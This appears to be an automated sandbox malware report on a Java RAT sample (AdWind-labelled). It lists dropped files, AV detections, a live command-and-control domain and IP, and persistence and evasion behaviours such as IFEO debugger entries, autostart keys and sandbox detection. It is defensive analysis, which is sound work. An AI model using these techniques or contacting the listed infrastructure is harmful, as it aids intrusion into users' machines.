        Security Software Discovery        		Distributed Component Object ModelInput Capture1
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchd1
        Services File Permissions Weakness        		1
        Registry Run Keys / Startup Folder        		1
        Bypass User Account Control        		LSA Secrets2
        Process Discovery        		SSHKeylogging11
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
        Services File Permissions Weakness        		21
        Masquerading        		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Modify Registry        		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
        Process Injection        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Services File Permissions Weakness        		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1427166 Sample: NewOrder - P2D041197.jar Startdate: 17/04/2024 Architecture: WINDOWS Score: 100 92 pnauco5.ddns.net 2->92 98 Multi AV Scanner detection for domain / URL 2->98 100 Malicious sample detected (through community Yara rule) 2->100 102 Antivirus detection for dropped file 2->102 106 11 other signatures 2->106 12 cmd.exe 2 2->12         started        signatures3 104 Uses dynamic DNS services 92->104 process4 signatures5 122 Uses regedit.exe to modify the Windows registry 12->122 15 java.exe 10 12->15         started        18 conhost.exe 12->18         started        process6 file7 90 C:\Users\user\zbrspjjraf.js, ASCII 15->90 dropped 20 wscript.exe 1 2 15->20         started        23 icacls.exe 1 15->23         started        process8 signatures9 108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 20->108 25 javaw.exe 24 20->25         started        30 conhost.exe 23->30         started        process10 dnsIp11 94 pnauco5.ddns.net 103.151.123.225, 49739, 5000 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN unknown 25->94 96 127.0.0.1 unknown unknown 25->96 82 C:\Users\...\Windows6471774156078736222.dll, PE32 25->82 dropped 84 C:\...\mNuEFMHNfs1412424943545557855.reg, ASCII 25->84 dropped 86 C:\Users\...\Retrive4614601071766058238.vbs, ASCII 25->86 dropped 88 C:\Users\...\Retrive4410908985771939559.vbs, ASCII 25->88 dropped 110 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 25->110 112 Excessive usage of taskkill to terminate processes 25->112 32 xcopy.exe 25->32         started        35 cmd.exe 25->35         started        37 java.exe 9 25->37         started        39 26 other processes 25->39 file12 signatures13 process14 file15 70 C:\Users\user\AppData\Roaming\...\zip.dll, PE32 32->70 dropped 72 C:\Users\user\AppData\...\wsdetect.dll, PE32 32->72 dropped 74 C:\Users\user\AppData\...\w2k_lsa_auth.dll, PE32 32->74 dropped 80 132 other malicious files 32->80 dropped 41 conhost.exe 32->41         started        43 regedit.exe 35->43         started        46 conhost.exe 35->46         started        76 C:\Users\...\Retrive6937263458449411198.vbs, ASCII 37->76 dropped 78 C:\Users\...\Retrive508991219844214216.vbs, ASCII 37->78 dropped 48 cmd.exe 37->48         started        50 cmd.exe 37->50         started        52 xcopy.exe 37->52         started        54 conhost.exe 37->54         started        56 conhost.exe 39->56         started        58 27 other processes 39->58 process16 signatures17 114 Creates an undocumented autostart registry key 43->114 116 Disables zone checking for all users 43->116 118 Creates a Image File Execution Options (IFEO) Debugger entry 43->118 120 3 other signatures 43->120 60 conhost.exe 48->60         started        62 cscript.exe 48->62         started        64 conhost.exe 50->64         started        66 cscript.exe 50->66         started        68 conhost.exe 52->68         started        process18

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs100%AviraVBS/Antiav.jre
        C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs100%AviraVBS/Agent.281
        C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs100%AviraVBS/Agent.281
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll100%AviraTR/Spy.Agent.lusda
        C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs100%AviraVBS/Antiav.jre
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll86%ReversingLabsWin32.Trojan.AdWind
        C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll80%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-2-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-errorhandling-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l1-2-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-file-l2-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-handle-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-heap-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-interlocked-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-libraryloader-l1-1-0.dll0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
        C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-localization-l1-2-0.dll0%VirustotalBrowse

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        pnauco5.ddns.net5%VirustotalBrowse

        URLs

        SourceDetectionScannerLabelLink
        http://java.sun.com/xml/dom/properties/0%URL Reputationsafe
        http://java.sun.com/xml/stream/properties/ignore-external-dtd0%URL Reputationsafe
        http://bugreport.sun.com/bugreport/0%URL Reputationsafe
        http://java.sun.com/xml/dom/properties/ancestor-check0%URL Reputationsafe
        http://javax.xml.XMLConstants/property/0%URL Reputationsafe
        http://java.sun.com/xml/stream/properties/reader-in-defined-state0%URL Reputationsafe
        http://javax.xml.XMLConstants/property/accessExternalDTD0%URL Reputationsafe
        http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0%URL Reputationsafe
        http://java.sun.com/xml/dom/properties/(0%VirustotalBrowse
        https://jrat.io7%VirustotalBrowse
        http://www.torchmobile.com/)1%VirustotalBrowse
        http://www.torchmobile.com/0%VirustotalBrowse
        http://chasen.aist-nara.ac.jp/chasen/distribution.html0%VirustotalBrowse
        http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace00%VirustotalBrowse

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pnauco5.ddns.net
        		103.151.123.225
        		truetrueunknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://java.sun.com/xml/dom/properties/(javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalseunknown
        http://apache.org/xml/features/validation/schema/augment-psvijavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
          		high
          http://apache.org/xml/properties/internal/document-scannerPjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
            		high
            https://jrat.iosjavaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmpfalse
              		unknown
              http://apache.org/xml/properties/input-buffer-sizejavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://apache.org/xml/features/g3javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                  		high
                  http://apache.org/xml/properties/internal/validator/dtde:javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://apache.org/xml/properties/internal/entity-managerjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://apache.org/xml/properties/internal/symbol-tableQjavaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://apache.org/xml/features/internal/parser-settingsjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://apache.org/xml/features/dom/include-ignorable-whitespacejavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://java.sun.com/xml/dom/properties/javaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://apache.org/xml/properties/internal/stax-entity-resolverjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://apache.org/xml/features/3java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://apache.org/xml/features/xinclude/fixup-base-urisjavaw.exe, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://apache.org/xml/properties/ionjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://apache.org/xml/properties/schema/external-noNamespaceSchemaLocationjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://apache.org/xml/properties/internal/error-reporterjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://apache.org/xml/features/validation/balance-syntax-treesre1javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://apache.org/xml/properties/schema/external-schemaLocationKjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://xml.org/sax/properties/(java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://apache.org/xml/features/include-commentsjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1723780631.0000000015BBC000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852025567.0000000015BC3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://apache.org/xml/features/scanner/notify-char-refsjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://apache.org/xml/features/validation/schema/normalized-valuenternalBjavaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://apache.org/xml/properties/dom/current-element-node9javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace0javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                                        http://apache.org/xml/features/validation/schema/normalized-valueBjava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://java.sun.com/xml/stream/properties/ignore-external-dtdjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://creativecommons.org/licenses/WOAFID3PrivateFramehttp://musicbrainz.org%d/%d%drxRemixcrxcopy.exe, 00000015.00000003.1703452847.00000000004DE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://apache.org/xml/features/continue-after-fatal-errorjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://apache.org/xml/features/standard-uri-conformantjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://apache.org/xml/properties/internal/document-scannerjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://apache.org/xml/features/validation/balance-syntax-treesljava.exe, 00000007.00000002.2851354329.0000000015736000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://apache.org/xml/features/validation/id-idref-checkingljava.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://xml.org/sax/features/eam;javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://xml.org/sax/properties/nt(javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://apache.org/xml/features/honour-all-schemaLocationsmpljavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://bugreport.sun.com/bugreport/java.exe, 00000002.00000002.1638031502.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FA7000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5AB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://java.oracle.com/java.exe, 00000002.00000002.1638031502.000000000A40A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2851634120.0000000009FB2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2849135334.000000000A5B6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://apache.org/xml/properties/internal/validation/schema/dv-factorynt7javaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://apache.org/xml/features/javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://apache.org/xml/features/generate-synthetic-annotationsjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://xml.org/sax/features/allow-dtd-events-after-endDTDjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://apache.org/xml/features/validation/id-idref-checking/sun/Fjavaw.exe, 00000006.00000003.1718488477.000000001563D000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2853953769.000000001562C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://github.com/rober42539/lao-dictionaryxcopy.exe, 00000015.00000003.1741591994.00000000004E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlyjavaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		high
